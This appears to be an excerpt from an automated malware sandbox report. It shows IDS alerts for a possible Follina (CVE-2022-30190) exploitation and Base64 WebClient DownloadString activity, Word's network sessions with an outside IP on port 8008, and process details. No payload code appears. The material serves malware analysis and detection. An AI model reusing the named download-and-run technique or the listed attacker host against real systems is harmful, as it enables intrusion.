06/15/22-07:10:38.181098 | TCP | 2023941 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M1 | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
06/15/22-07:10:38.181098 | TCP | 2023942 | ET TROJAN Possibly Malicious Base64 Unicode WebClient DownloadString M2 | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
06/15/22-07:10:38.181098 | TCP | 2036726 | ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) | 8008 | 49181 | 117.48.146.246 | 192.168.2.22 |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49173 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:20.359492064 CEST | 1 | OUT | |
Jun 15, 2022 07:10:20.626133919 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49174 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:27.159310102 CEST | 3 | OUT | |
Jun 15, 2022 07:10:27.424031019 CEST | 3 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49175 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:31.726026058 CEST | 3 | OUT | |
Jun 15, 2022 07:10:31.981645107 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 117.48.146.246 | 8008 | 192.168.2.22 | 49176 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:34.891915083 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 117.48.146.246 | 8008 | 192.168.2.22 | 49177 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:35.456864119 CEST | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49178 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:35.776213884 CEST | 6 | OUT | |
Jun 15, 2022 07:10:36.033222914 CEST | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49179 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:36.806541920 CEST | 13 | OUT | |
Jun 15, 2022 07:10:37.072026968 CEST | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49180 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:37.390980005 CEST | 14 | OUT | |
Jun 15, 2022 07:10:37.646136999 CEST | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49181 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:37.922209024 CEST | 15 | OUT | |
Jun 15, 2022 07:10:38.181097984 CEST | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49182 | 117.48.146.246 | 8008 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 15, 2022 07:10:38.896841049 CEST | 22 | OUT | |
Jun 15, 2022 07:10:39.150418043 CEST | 22 | IN |
Target ID: | 0 |
Start time: | 07:11:14 |
Start date: | 15/06/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f280000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |